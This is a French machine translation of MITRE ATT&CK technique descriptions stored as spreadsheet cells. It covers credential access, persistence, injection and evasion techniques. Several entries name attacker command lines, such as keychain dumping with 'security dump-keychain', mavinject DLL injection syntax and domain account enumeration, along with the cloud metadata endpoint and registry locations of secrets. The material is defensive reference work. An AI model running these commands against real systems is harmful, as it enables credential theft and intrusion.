La plupart des fournisseurs de services cloud prennent en charge une API de métadonnées d’instance cloud, qui est un service fourni aux instances virtuelles en cours d’exécution qui permet aux applications d’accéder aux informations sur l’instance virtuelle en cours d’exécution. Les informations disponibles incluent généralement le nom, le groupe de sécurité et des métadonnées supplémentaires, y compris des données sensibles telles que des informations d’identification et des scripts UserData qui peuvent contenir des secrets supplémentaires. L’API de métadonnées d’instance est fournie à titre pratique pour faciliter la gestion des applications et est accessible à toute personne pouvant accéder à l’instance. (Référence : API de métadonnées d’instance AWS) Une API de métadonnées cloud a été utilisée dans au moins une compromission de haut niveau. (Citation : Krebs Capital One, août 2019)
Si des adversaires sont présents sur l’instance virtuelle en cours d’exécution, ils peuvent interroger directement l’API de métadonnées d’instance pour identifier les informations d’identification qui permettent d’accéder à des ressources supplémentaires. De plus, les adversaires peuvent exploiter une vulnérabilité SSRF (Server-Side Request Forgery) dans un proxy Web public qui leur permet d’accéder aux informations sensibles via une requête adressée à l’API de métadonnées d’instance. (Citation : API de métadonnées d’instance RedLock 2018)
La norme de facto pour les fournisseurs de services cloud est d’héberger l’API de métadonnées d’instance à l’adresse &lt;code&gt;http[ :]//169.254.169.254&lt;/code&gt;.
https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>Un adversaire disposant d’un accès root peut collecter des informations d’identification en lisant la mémoire de « securityd ». 'Securityd' est un service/démon responsable de la mise en œuvre de protocoles de sécurité tels que le cryptage et l’autorisation. (Citation : Apple Dev SecurityD) Un adversaire privilégié peut être en mesure d’analyser la mémoire de « securityd » pour trouver la séquence de clés correcte afin de déchiffrer le trousseau de connexion de l’utilisateur. Cela peut fournir à l’adversaire divers mots de passe en texte brut, tels que ceux des utilisateurs, du WiFi, de la messagerie, des navigateurs, des certificats, des notes sécurisées, etc. (Citation : OS X Keychain)
Dans OS X antérieur à El Capitan, les utilisateurs disposant d’un accès root peuvent lire les mots de passe du trousseau en texte brut des utilisateurs connectés, car l’implémentation du trousseau d’Apple permet de mettre en cache ces informations d’identification afin que les utilisateurs ne soient pas invités à saisir leurs mots de passe à plusieurs reprises. (Citation : Porte-clés OS X)(citation : externe à DA, à la manière d’OS X) L’utilitaire « sécurisé » d’Apple prend le mot de passe de connexion de l’utilisateur, le crypte avec PBKDF2 et stocke cette clé principale en mémoire. Apple utilise également un ensemble de clés et d’algorithmes pour chiffrer le mot de passe de l’utilisateur, mais une fois la clé principale trouvée, un adversaire n’a qu’à itérer sur les autres valeurs pour déverrouiller le mot de passe final. (Citation : Porte-clés OS X)
https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les paramètres de stratégie de groupe afin d’identifier les chemins d’accès à l’élévation des privilèges, les mesures de sécurité appliquées au sein d’un domaine et de découvrir des modèles dans les objets du domaine qui peuvent être manipulés ou utilisés pour se fondre dans l’environnement. La stratégie de groupe permet une gestion centralisée des paramètres de l’utilisateur et de l’ordinateur dans Active Directory (AD). Les objets de stratégie de groupe (GPO) sont des conteneurs pour les paramètres de stratégie de groupe composés de fichiers stockés dans un chemin d’accès réseau prévisible '\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\'.( Citation : Principes de base de la politique de groupe TechNet (Citation : ADSecurity GPO Persistence 2016)
Les adversaires peuvent utiliser des commandes telles que &lt;code&gt;gpresult&lt;/code&gt; ou diverses fonctions PowerShell accessibles publiquement, telles que &lt;code&gt;Get-DomainGPO&lt;/code&gt; et &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt;, pour collecter des informations sur les paramètres de stratégie de groupe. (Citation : Microsoft gpresult)(Citation : Github PowerShell Empire) Les adversaires peuvent utiliser ces informations pour façonner des comportements ultérieurs, notamment pour déterminer les chemins d’attaque potentiels au sein du réseau cible, ainsi que les possibilités de manipuler les paramètres de stratégie de groupe (c’est-à-dire [Modification de la politique de domaine ou de locataire](https://attack.mitre.org/techniques/T1484)) à leur avantage.
https://attack.mitre.org/techniques/T1615</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des bootkits pour persister sur les systèmes. Les bootkits résident à une couche inférieure au système d’exploitation et peuvent rendre difficile l’exécution d’une correction complète, à moins qu’une organisation ne soupçonne qu’un tel kit a été utilisé et ne puisse agir en conséquence.
Un bootkit est une variante d’un logiciel malveillant qui modifie les secteurs d’amorçage d’un disque dur, y compris le Master Boot Record (MBR) et le Volume Boot Record (VBR). (Citation : Mandiant M Trends 2016) Le MBR est la section du disque qui est chargée en premier après l’initialisation du matériel par le BIOS. Il s’agit de l’emplacement du chargeur de démarrage. Un adversaire qui dispose d’un accès brut au lecteur de démarrage peut écraser cette zone, détournant l’exécution au démarrage du chargeur de démarrage normal vers le code de l’adversaire. (Citation : Lau 2011)
Le MBR transmet le contrôle du processus de démarrage au VBR. Comme dans le cas de MBR, un adversaire qui dispose d’un accès brut au lecteur de démarrage peut écraser le VBR pour détourner l’exécution au démarrage vers le code adversaire.
https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des supports amovibles connectés sur des ordinateurs qu’ils ont compromis pour trouver des fichiers qui les intéressent. Les données sensibles peuvent être collectées à partir de n’importe quel support amovible (lecteur de disque optique, clé USB, etc.) connecté au système compromis avant l’exfiltration. Des shells de commande interactifs peuvent être utilisés, et des fonctionnalités communes à [cmd](https://attack.mitre.org/software/S0106) peuvent être utilisées pour collecter des informations. 
Certains adversaires peuvent également utiliser [Collecte automatisée](https://attack.mitre.org/techniques/T1119) sur des supports amovibles.
https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de code malveillant mavinject.exe au proxy. Mavinject.exe s’agit de l’injecteur de virtualisation d’applications Microsoft, un utilitaire Windows qui peut injecter du code dans des processus externes dans le cadre de la virtualisation d’applications Microsoft (App-V). (Citation : LOLBAS Mavinject)
Les adversaires peuvent abuser de mavinject.exe pour injecter des DLL malveillantes dans les processus en cours d’exécution (par exemple, [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), permettant l’exécution arbitraire de code (par exemple, &lt;code&gt;C :\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL&lt;/code&gt;). (Citation : ATT Lazarus TTP Evolution)(Citation : Reaqta Mavinject) Étant donné que mavinject.exe peuvent être signées numériquement par Microsoft, l’exécution par proxy via cette méthode peut échapper à la détection par les produits de sécurité, car l’exécution est masquée dans le cadre d’un processus légitime. 
En plus de [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe peut également être utilisé de manière abusive pour effectuer l’injection de descripteurs d’importation via son paramètre &lt;code&gt;de ligne de commande /HMODULE&lt;/code&gt; (par exemple, &lt;code&gt;mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER&lt;/code&gt;). Cette commande injecterait une entrée de table d’importation composée de la DLL spécifiée dans le module à l’adresse de base donnée. (Citation : Fonctionnalité Mavinject déconstruite)
https://attack.mitre.org/techniques/T1218/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent regrouper les données collectées dans un emplacement central ou un répertoire sur le système local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Les adversaires peuvent également regrouper les données collectées dans divers formats/emplacements disponibles d’un système, y compris les bases de données/référentiels de stockage locaux ou le registre Windows. (Citation : Prevailion DarkWatchman 2021)
https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent correspondre ou se rapprocher du nom ou de l’emplacement de fichiers ou de ressources légitimes lorsqu’ils les nomment/placent. Ceci est fait dans le but d’échapper aux défenses et à l’observation. Cela peut être fait en plaçant un exécutable dans un répertoire de confiance commune (ex : sous System32) ou en lui donnant le nom d’un programme légitime et fiable (ex : svchost.exe). Dans les environnements conteneurisés, cela peut également être fait en créant une ressource dans un espace de noms qui correspond à la convention de nommage d’un pod ou d’un cluster de conteneur. Alternativement, un nom de fichier ou d’image de conteneur donné peut être une approximation proche de programmes/images légitimes ou quelque chose d’inoffensif.
Les adversaires peuvent également utiliser la même icône que celle du fichier qu’ils essaient d’imiter.
https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des certificats SSL/TLS auto-signés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Dans le cas de l’auto-signature, les certificats numériques ne disposent pas de l’élément de confiance associé à la signature d’une autorité de certification (CA) tierce.
Les adversaires peuvent créer des certificats SSL/TLS auto-signés qui peuvent être utilisés pour poursuivre leurs opérations, telles que le chiffrement du trafic C2 (ex : [Chiffrement asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)) ou même l’activation de [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) s’ils sont ajoutés à la racine de confiance (c’est-à-dire [Installer le certificat racine](https://attack.mitre.org/techniques/T1553/004)).
Après avoir créé un certificat numérique, un adversaire peut ensuite installer ce certificat (voir [Installer un certificat numérique](https://attack.mitre.org/techniques/T1608/003)) sur l’infrastructure sous son contrôle.
https://attack.mitre.org/techniques/T1587/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent insérer, supprimer ou manipuler des données au repos afin d’influencer des résultats externes ou de cacher des activités, menaçant ainsi l’intégrité des données. (Citation : FireEye APT38 octobre 2018)(Citation : DOJ Lazarus Sony 2018) En manipulant les données stockées, les adversaires peuvent tenter d’affecter un processus métier, la compréhension organisationnelle et la prise de décision.
Les données stockées peuvent inclure divers formats de fichiers, tels que des fichiers Office, des bases de données, des e-mails stockés et des formats de fichiers personnalisés. Le type de modification et l’impact qu’elle aura dépendent du type de données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https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le craquage de mot de passe pour tenter de récupérer des informations d’identification utilisables, telles que des mots de passe en texte brut, lorsque des éléments d’identification tels que des hachages de mot de passe sont obtenus. [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) peut être utilisé pour obtenir des hachages de mot de passe, cela ne peut obtenir un adversaire que jusqu’à présent lorsque [Passer le hachage](https://attack.mitre.org/techniques/T1550/002) n’est pas une option. De plus, les adversaires peuvent exploiter [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) afin d’obtenir des informations d’identification hachées pour les périphériques réseau. (Référence : US-CERT-TA18-106A) 
Des techniques permettant de deviner systématiquement les mots de passe utilisés pour calculer les hachages sont disponibles, ou l’adversaire peut utiliser une table arc-en-ciel précalculée pour craquer les hachages. Le craquage des hachages est généralement effectué sur des systèmes contrôlés par l’adversaire en dehors du réseau cible. (Citation : Wikipédia Craquage de mot de passe) Le mot de passe en texte brut résultant d’un hachage réussi peut être utilisé pour se connecter aux systèmes, ressources et services auxquels le compte a accès.
https://attack.mitre.org/techniques/T1110/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler les e-mails des utilisateurs sur les systèmes locaux pour collecter des informations sensibles. Les fichiers contenant des données de courrier électronique peuvent être acquis à partir du système local d’un utilisateur, tel que le stockage Outlook ou les fichiers cache.
Outlook stocke les données localement dans des fichiers de données hors connexion avec l’extension .ost. Outlook 2010 et versions ultérieures prennent en charge des fichiers .ost d’une taille maximale de 50 Go, tandis que les versions antérieures d’Outlook prennent en charge jusqu’à 20 Go. (Citation : Tailles de fichier Outlook) Les comptes IMAP dans Outlook 2013 (et versions antérieures) et les comptes POP utilisent des fichiers de données Outlook (.pst) au lieu de .ost, tandis que les comptes IMAP dans Outlook 2016 (et versions ultérieures) utilisent des fichiers .ost. Les deux types de fichiers de données Outlook sont généralement stockés dans 'C :\Users\&lt;username&gt;\Documents\Outlook Files' ou 'C :\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook'.( Citation : Fichiers Microsoft Outlook)
https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir des informations d’identification à partir du trousseau. Le trousseau (ou Services de trousseau) est le système de gestion des informations d’identification macOS qui stocke les noms de compte, les mots de passe, les clés privées, les certificats, les données d’application sensibles, les données de paiement et les notes sécurisées. Il existe trois types de trousseaux : le trousseau de connexion, le trousseau système et le trousseau d’éléments locaux (iCloud). Le trousseau par défaut est le trousseau de connexion, qui stocke les mots de passe et les informations des utilisateurs. Le trousseau système stocke les éléments auxquels le système d’exploitation accédait, tels que les éléments partagés entre les utilisateurs d’un hôte. Le trousseau d’articles locaux (iCloud) est utilisé pour les éléments synchronisés avec le service iCloud d’Apple. 
Les trousseaux peuvent être affichés et modifiés via l’application Trousseau d’accès ou à l’aide de l’utilitaire &lt;code&gt;de sécurité de&lt;/code&gt; ligne de commande. Les fichiers du trousseau se trouvent dans &lt;code&gt;~/Library/Keychains/&lt;/code&gt;, &lt;code&gt;/Library/Keychains/&lt;/code&gt; et &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation : Keychain Services Apple)(Citation : Passware de déchiffrement du trousseau)(Citation : Porte-clés OSX Schaumann)
Les adversaires peuvent collecter les informations d’identification de l’utilisateur à partir du stockage/de la mémoire du trousseau. Par exemple, la commande &lt;code&gt;security dump-keychain –d&lt;/code&gt; sauvegardera toutes les informations d’identification du trousseau de connexion à partir de &lt;code&gt;~/Library/Keychains/login.keychain-db&lt;/code&gt;. Les adversaires peuvent également lire directement les informations d’identification du trousseau de connexion à partir du fichier &lt;code&gt;~/Library/Keychains/login.keychain&lt;/code&gt;. Les deux méthodes nécessitent un mot de passe, où le mot de passe par défaut pour le trousseau de connexion est le mot de passe de l’utilisateur actuel pour se connecter à l’hôte macOS. (citation : externe à DA, à la manière d’OS X)(Citation : Décryptage du porte-clés Empire)
https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent configurer les paramètres système pour exécuter automatiquement un programme lors du démarrage ou de la connexion du système afin de maintenir la persistance ou d’obtenir des privilèges de niveau supérieur sur les systèmes compromis. Les systèmes d’exploitation peuvent avoir des mécanismes pour exécuter automatiquement un programme lors du démarrage du système ou de la connexion au compte. (Citation : Clé d’exécution Microsoft)(Citation : Packages d’authentification MSDN)(Citation : Microsoft TimeProvider)(Citation : Cylance Reg Persistence septembre 2013)(Citation : Programmation du noyau Linux) Ces mécanismes peuvent inclure l’exécution automatique de programmes placés dans des répertoires spécialement désignés ou référencés par des référentiels qui stockent des informations de configuration, tels que le registre Windows. Un adversaire peut atteindre le même objectif en modifiant ou en étendant des fonctionnalités du noyau.
Étant donné que certains programmes de démarrage automatique de démarrage ou d’ouverture de session s’exécutent avec des privilèges plus élevés, un adversaire peut les exploiter pour élever les privilèges.
https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>Les adversaires disposant d’un accès SYSTEM à un hôte peuvent tenter d’accéder aux secrets LSA (Local Security Authority), qui peuvent contenir divers éléments d’identification différents, tels que des informations d’identification pour les comptes de service. (Citation : Passcape LSA Secrets)(citation : Modèle de niveau administrateur Microsoft AD)(Citation : Références Windows Tilbury) Les secrets LSA sont stockés dans le registre à l’emplacement &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. Les secrets LSA peuvent également être vidés de la mémoire. (Citation : ired Dumping LSA Secrets)
[Rég.](https://attack.mitre.org/software/S0075) peut être utilisé pour extraire du registre. [Mimikatz](https://attack.mitre.org/software/S0002) peut être utilisé pour extraire des secrets de la mémoire. (Citation : ired Dumping LSA Secrets)
https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre la capacité de chiffrement d’un périphérique réseau afin de contourner le chiffrement qui protégerait autrement les communications de données. (Citation : Cisco Synful Knock Evolution)
Le chiffrement peut être utilisé pour protéger le trafic réseau transmis afin de préserver sa confidentialité (protection contre la divulgation non autorisée) et son intégrité (protection contre les modifications non autorisées). Les chiffrements de chiffrement sont utilisés pour convertir un message en texte brut en texte chiffré et peuvent nécessiter beaucoup de calcul pour être déchiffrés sans la clé de déchiffrement associée. En règle générale, les clés plus longues augmentent le coût de la cryptanalyse, ou du déchiffrement sans la clé.
Les adversaires peuvent compromettre et manipuler les appareils qui effectuent le chiffrement du trafic réseau. Par exemple, par le biais de comportements tels que [Modifier l’image système](https://attack.mitre.org/techniques/T1601), [Réduire l’espace clé](https://attack.mitre.org/techniques/T1600/001) et [Désactiver le matériel cryptographique](https://attack.mitre.org/techniques/T1600/002), un adversaire peut affecter négativement et/ou éliminer la capacité d’un appareil à chiffrer en toute sécurité le trafic réseau. Cela présente un risque accru de divulgation non autorisée et peut faciliter la manipulation des données, l’accès aux identifiants ou les efforts de collecte. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>Un adversaire peut falsifier des jetons SAML avec toutes les autorisations, revendications et durées de vie s’il possède un certificat de signature de jeton SAML valide. (Citation : Étapes de Microsoft SolarWinds) La durée de vie par défaut d’un jeton SAML est d’une heure, mais la période de validité peut être spécifiée dans la valeur &lt;code&gt;NotOnOrAfter&lt;/code&gt; de l’élément &lt;code&gt;conditions ...&lt;/code&gt; d’un jeton. Cette valeur peut être modifiée à l’aide de &lt;code&gt;AccessTokenLifetime&lt;/code&gt; dans une &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;. (Citation : Durée de vie des jetons SAML Microsoft) Les jetons SAML falsifiés permettent aux adversaires de s’authentifier sur les services qui utilisent SAML 2.0 comme mécanisme d’authentification unique (SSO). (Citation : Cyberark Golden SAML)
Un adversaire peut utiliser des [clés privées](https://attack.mitre.org/techniques/T1552/004) pour compromettre le certificat de signature de jeton d’une organisation afin de créer des jetons SAML falsifiés. Si l’adversaire dispose des autorisations suffisantes pour établir une nouvelle approbation de fédération avec son propre serveur AD FS (Active Directory Federation Services), il peut générer son propre certificat de signature de jeton approuvé. (Citation : Guide client de Microsoft SolarWinds) Cela diffère de [Voler le jeton d’accès à l’application](https://attack.mitre.org/techniques/T1528) et d’autres comportements similaires en ce sens que les jetons sont nouveaux et falsifiés par l’adversaire, plutôt que volés ou interceptés auprès d’utilisateurs légitimes.
Un adversaire peut obtenir des privilèges d’ID Entra administratif si un jeton SAML falsifié qui prétend représenter un compte hautement privilégié est falsifié. Cela peut conduire à [Utiliser un autre matériel d’authentification](https://attack.mitre.org/techniques/T1550), qui peut contourner les mécanismes de protection multifactoriels et autres mécanismes de protection contre l’authentification. (Citation : Guide client de Microsoft SolarWinds)
https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent faire passer des charges utiles malveillantes pour des fichiers légitimes en modifiant la mise en forme de la charge utile, y compris la signature, l’extension et le contenu du fichier. Différents types de fichiers ont un format standard typique, y compris la façon dont ils sont encodés et organisés. Par exemple, la signature d’un fichier (également appelée en-tête ou octets magiques) est le premier octet d’un fichier et est souvent utilisée pour identifier le type de fichier. Par exemple, l’en-tête d’un fichier JPEG est &lt;code&gt; 0xFF 0xD8&lt;/code&gt; et l’extension de fichier est '. JPE', '. JPEG » ou « .JPG ». 
Les adversaires peuvent modifier le code hexadécimal de l’en-tête et/ou l’extension de fichier d’une charge utile malveillante afin de contourner les vérifications de validation de fichier et/ou le nettoyage des entrées. Ce comportement est couramment utilisé lorsque des fichiers de charge utile sont transférés (par exemple, [Transfert d’outil d’entrée](https://attack.mitre.org/techniques/T1105)) et stockés (par exemple, [Charger un logiciel malveillant](https://attack.mitre.org/techniques/T1608/001)) afin que les adversaires puissent déplacer leurs programmes malveillants sans déclencher de détections. 
Les types et extensions de fichiers non exécutables courants, tels que les fichiers texte (.txt  et les fichiers image (.jpg .gif, etc.) peuvent généralement être traités comme inoffensifs.  Sur cette base, les adversaires peuvent utiliser une extension de fichier pour dissimuler des logiciels malveillants, par exemple en nommant un code de porte dérobée PHP avec un nom de fichier de &lt;code&gt;test.gif&lt;/code&gt;. Un utilisateur peut ne pas savoir qu’un fichier est malveillant en raison de son apparence bénigne et de son extension.
Les fichiers polygots, c’est-à-dire des fichiers qui ont plusieurs types de fichiers différents et qui fonctionnent différemment en fonction de l’application qui les exécutera, peuvent également être utilisés pour dissimuler des logiciels malveillants et des capacités malveillantes. (Référence : polygot_icedID)
https://attack.mitre.org/techniques/T1036/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent arrêter ou désactiver des services sur un système pour rendre ces services indisponibles pour les utilisateurs légitimes. L’arrêt de services ou de processus critiques peut inhiber ou arrêter la réponse à un incident ou contribuer aux objectifs globaux de l’adversaire de causer des dommages à l’environnement. (Citation : Talos Olympic Destroyer 2018)(Citation : Novetta Blockbuster) 
Les adversaires peuvent y parvenir en désactivant des services individuels de grande importance pour une organisation, tels que &lt;code&gt;MSExchangeIS,&lt;/code&gt; ce qui rendra le contenu Exchange inaccessible. (Citation : Novetta Blockbuster) Dans certains cas, les adversaires peuvent arrêter ou désactiver plusieurs ou tous les services pour rendre les systèmes inutilisables. (Citation : Talos Olympic Destroyer 2018) Les services ou les processus peuvent ne pas permettre la modification de leurs magasins de données pendant leur exécution. Les adversaires peuvent arrêter des services ou des processus afin d’effectuer [Destruction de données](https://attack.mitre.org/techniques/T1485) ou [Données chiffrées pour impact](https://attack.mitre.org/techniques/T1486) sur les magasins de données de services tels qu’Exchange et SQL Server. (Citation : Analyse WannaCry de SecureWorks)
https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>Les adversaires peuvent développer des logiciels malveillants et des composants de logiciels malveillants qui peuvent être utilisés lors du ciblage. La création de logiciels malveillants peut inclure le développement de charges utiles, de droppers, d’outils de post-compromission, de portes dérobées (y compris des images de porte dérobée), de packers, de protocoles C2 et la création de supports amovibles infectés. Les adversaires peuvent développer des logiciels malveillants pour soutenir leurs opérations, créant ainsi un moyen de garder le contrôle des machines distantes, d’échapper aux défenses et d’exécuter des comportements post-compromission. (Référence : Mandiant APT1)(Référence : Kaspersky Sofacy)(Citation : ActiveMalwareEnergy)(Citation : FBI Flash FIN7 USB)
Comme pour les efforts de développement légitimes, différents ensembles de compétences peuvent être nécessaires pour développer des logiciels malveillants. Les compétences nécessaires peuvent être acquises à l’interne ou faire l’objet d’une sous-traitance. Le recours à un sous-traitant peut être considéré comme une extension des capacités de développement de logiciels malveillants de cet adversaire, à condition que l’adversaire joue un rôle dans l’élaboration des exigences et maintienne un certain degré d’exclusivité sur le logiciel malveillant.
Certains aspects du développement de logiciels malveillants, tels que le développement du protocole C2, peuvent nécessiter que les adversaires obtiennent une infrastructure supplémentaire. Par exemple, les logiciels malveillants développés qui communiqueront avec Twitter pour C2 peuvent nécessiter l’utilisation de [Services Web](https://attack.mitre.org/techniques/T1583/006). (Référence : FireEye APT29)
https://attack.mitre.org/techniques/T1587/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’énumérer les pilotes de périphériques locaux sur un hôte victime. Les informations sur les pilotes de périphériques peuvent mettre en évidence diverses informations qui façonnent les comportements ultérieurs, tels que la fonction/l’objectif de l’hôte, les outils de sécurité actuels (par exemple, [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) ou d’autres défenses (par exemple, [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), ainsi que les vulnérabilités potentiellement exploitables (par exemple, [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068)).
De nombreux utilitaires de système d’exploitation peuvent fournir des informations sur les pilotes de périphériques locaux, tels que driverquery.exe et la fonction API « EnumDeviceDrivers() » sous Windows. (Citation : Microsoft Driverquery)(Citation : Microsoft EnumDeviceDrivers) Des informations sur les pilotes de périphériques (ainsi que sur les services associés, c’est-à-dire [System Service Discovery](https://attack.mitre.org/techniques/T1007)) peuvent également être disponibles dans le registre. (Citation : Pilotes de registre Microsoft)
Sous Linux/macOS, les pilotes de périphériques (sous la forme de modules du noyau) peuvent être visibles dans '/dev' ou à l’aide d’utilitaires tels que 'lsmod' et 'modinfo'. (Citation : Programmation du noyau Linux)(Citation : lsmod man)(Citation : modinfo man)
https://attack.mitre.org/techniques/T1652</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes de domaine. Ces informations peuvent aider les adversaires à déterminer quels comptes de domaine existent pour faciliter les comportements de suivi, tels que le ciblage de comptes spécifiques possédant des privilèges particuliers.
Des commandes telles que &lt;code&gt;net user /domain&lt;/code&gt; et &lt;code&gt;net group /domain&lt;/code&gt; de l’utilitaire [Net](https://attack.mitre.org/software/S0039), &lt;code&gt;dscacheutil -q group&lt;/code&gt; sur macOS et &lt;code&gt;ldapsearch&lt;/code&gt; sur Linux peuvent répertorier les utilisateurs et les groupes de domaine. [PowerShell](https://attack.mitre.org/techniques/T1059/001) les applets de commande, y compris &lt;code&gt;Get-ADUser&lt;/code&gt; et &lt;code&gt;Get-ADGroupMember&lt;/code&gt;, peuvent énumérer les membres de groupes Active Directory. (Citation : CrowdStrike StellarParticle, janvier 2022)
https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir la persistance en ajoutant une clé de registre à l’installation active de l’ordinateur local. L’installation active est un mécanisme Windows qui est utilisé pour exécuter des programmes lorsqu’un utilisateur se connecte. La valeur stockée dans la clé de registre sera exécutée une fois qu’un utilisateur s’est connecté à l’ordinateur. (Citation : Klein Active Setup 2010) Ces programmes seront exécutés dans le contexte de l’utilisateur et disposeront du niveau d’autorisations associé au compte.
Les adversaires peuvent abuser du programme d’installation active en créant une clé sous &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; et en définissant une valeur malveillante pour &lt;code&gt;StubPath&lt;/code&gt;. Cette valeur servira de programme qui sera exécuté lorsqu’un utilisateur se connectera à l’ordinateur. (Référence : Mandiant Glyer APT 2010)(Citation : Citizenlab Packrat 2015)(Citation : FireEye CFR Watering Hole 2012)(Citation : SECURELIST Bright Star 2015)(Citation : paloalto Tropic Trooper 2016)
Les adversaires peuvent abuser de ces composants pour exécuter des logiciels malveillants, tels que des outils d’accès à distance, afin de maintenir la persistance lors des redémarrages du système. Les adversaires peuvent également utiliser [Mascarade](https://attack.mitre.org/techniques/T1036) pour donner l’impression que les entrées du Registre sont associées à des programmes légitimes.
https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de cacher des artefacts associés à leurs comportements pour échapper à la détection. Les systèmes d’exploitation peuvent avoir des fonctionnalités permettant de masquer divers artefacts, tels que des fichiers système importants et l’exécution de tâches administratives, afin d’éviter de perturber l’environnement de travail des utilisateurs et d’empêcher les utilisateurs de modifier les fichiers ou les fonctionnalités du système. Les adversaires peuvent abuser de ces fonctionnalités pour masquer des artefacts tels que des fichiers, des répertoires, des comptes d’utilisateurs ou d’autres activités du système afin d’échapper à la détection. (Citation : Sofacy Komplex Trojan)(Citation : Cybereason OSX Pirrit)(Citation : MalwareBytes ADS juillet 2015)
Les adversaires peuvent également tenter de masquer des artefacts associés à un comportement malveillant en créant des régions informatiques isolées des instruments de sécurité courants, par exemple en utilisant la technologie de virtualisation. (Citation : Sophos Ragnar mai 2020)
https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser Windows Dynamic Data Exchange (DDE) pour exécuter des commandes arbitraires. DDE est un protocole client-serveur pour la communication inter-processus (IPC) unique et/ou continue entre les applications. Une fois qu’un lien est établi, les applications peuvent échanger de manière autonome des transactions composées de chaînes, de liens de données chaudes (notifications lorsqu’un élément de données change), de liens de données chaudes (duplications des modifications apportées à un élément de données) et de demandes d’exécution de commandes.
L’OLE (Object Linking and Embedding), ou la capacité de lier des données entre des documents, a été initialement mise en œuvre par DDE. Bien qu’il ait été remplacé par [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE peut être activé dans Windows 10 et la plupart de Microsoft Office 2016 via des clés de registre. (Citation : BleepingComputer DDE désactivé dans Word décembre 2017)(Citation : Microsoft ADV170021 décembre 2017)(Citation : Microsoft DDE Advisory Nov 2017)
Les documents Microsoft Office peuvent être empoisonnés à l’aide de commandes DDE, directement ou par le biais de fichiers intégrés, et utilisés pour fournir une exécution via des campagnes de [phishing](https://attack.mitre.org/techniques/T1566) ou du contenu Web hébergé, en évitant l’utilisation de macros Visual Basic pour Applications (VBA). (Citation : SensePost PS DDE mai 2016)(Citation : Bouilloire CSV DDE août 2014)(Citation : Enigma Reviving DDE janvier 2018)(Citation : SensePost MacroLess DDE octobre 2017) De même, les adversaires peuvent infecter des charges utiles pour exécuter des applications et/ou des commandes sur un appareil victime en intégrant des formules DDE dans un fichier CSV destiné à être ouvert via un tableur Windows. (Citation : Injection de CSV OWASP)(Citation : Injection de macro CSV Excel )
DDE pourrait également être exploité par un adversaire opérant sur une machine compromise qui n’a pas d’accès direct à un [interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059). L’exécution DDE peut être appelée à distance via [Remote Services](https://attack.mitre.org/techniques/T1021) tels que [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM). (Référence : Fireeye Hunting COM juin 2019)
https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>Un adversaire peut s’appuyer sur l’ouverture d’un fichier malveillant par un utilisateur afin d’obtenir l’exécution. Les utilisateurs peuvent être soumis à l’ingénierie sociale pour les amener à ouvrir un fichier qui conduira à l’exécution de code. Cette action de l’utilisateur est généralement observée comme un comportement de suivi de [Pièce jointe de spearphishing](https://attack.mitre.org/techniques/T1566/001). Les adversaires peuvent utiliser plusieurs types de fichiers qui nécessitent l’exécution d’un utilisateur, notamment .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, etc. .reg.
